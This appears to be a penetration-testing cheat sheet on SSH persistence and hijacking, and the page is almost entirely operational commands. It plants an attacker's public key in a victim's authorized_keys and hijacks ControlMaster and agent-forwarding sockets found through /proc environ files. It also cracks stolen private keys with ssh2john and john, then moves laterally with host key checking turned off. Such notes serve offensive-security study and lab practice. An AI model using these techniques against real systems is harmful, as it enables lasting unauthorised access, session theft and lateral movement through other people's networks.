SSH

SSH Persistence and Hijacking

Peristence

if writable on victim

~/.ssh/authorized_keys

Create keys on attacker box

ssh-keygen

Copy id_rsa.pub key to victim

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/kali/.ssh/authorized_keys
ssh-copy-id "user@hostname.example.com -p <port-number>"
cat ~/.ssh/id_rsa.pub | ssh <user>@<hostname> 'cat >> .ssh/authorized_keys

Now you can SSH without a passphrase

ssh kali@linuxvictim

SSH Agent-Forwarding

Looking for socket files

  • Use existing connection to get to another machine

  • modification of ~/.ssh/config

  • any new connections will try to use an existing control socket

  • need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config && mkdir ~/.ssh/controlmaster

  • Create keys

ssh-keygen

  • public keys need to be copied to the other boxes if possible

ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@controller  
ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@linuxvictim

  • Must modify local .ssh/config file to enable forward agent

echo "ForwardAgent yes" >> .ssh/config

  • The intermediate server / controller must have AllowAgentForwarding in sshd config enabled

grep AllowAgentForwarding /etc/ssh/sshd_config

  • must enable the ssh agent on our Kali box

eval 'ssh-agent'

  • now we must add our keys to the ssh agent

ssh-add

  • ssh into the controller as offsec, then ssh into the linuxvictim as offsec and exit the linux victim session

Controlmaster config


Host *  
ControlPath ~/.ssh/controlmaster/%r@%h:%p  
ControlMaster auto  
ControlPersist 10m
ForwardAgent yes

  • need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config  
mkdir ~/.ssh/controlmaster

  • if there happens to be a session it can be seen in the controlmaster folder created


ls -al ~/.ssh/controlmaster/

  • If there is an entry you can ssh to that box by specifying ssh -S

ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim

Enumeration of sockets

  • Looking for the "SSH_AUTH_SOCK entry"

ps -aux | grep ssh

pstree -p offsec | grep ssh\

cat /proc/[pid]/environ

Look for the last line "SSH_AUTH_SOCK"

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380
ssh-add -l
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380
ssh offsec@linuxvictim

Cracking SSH Keys

Copy SSH key to Kali

python /usr/share/john/ssh2john.py svuser.key > svuser.hash

gunzip /usr/share/wordlists/rockyou.gz (if not already done)

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

Use cracked key to laterally move

ssh -i ./svuser.key -o StrictHostKeyChecking=no svuser@controller
PreviousImpacketNextKerberos Cache File

Last updated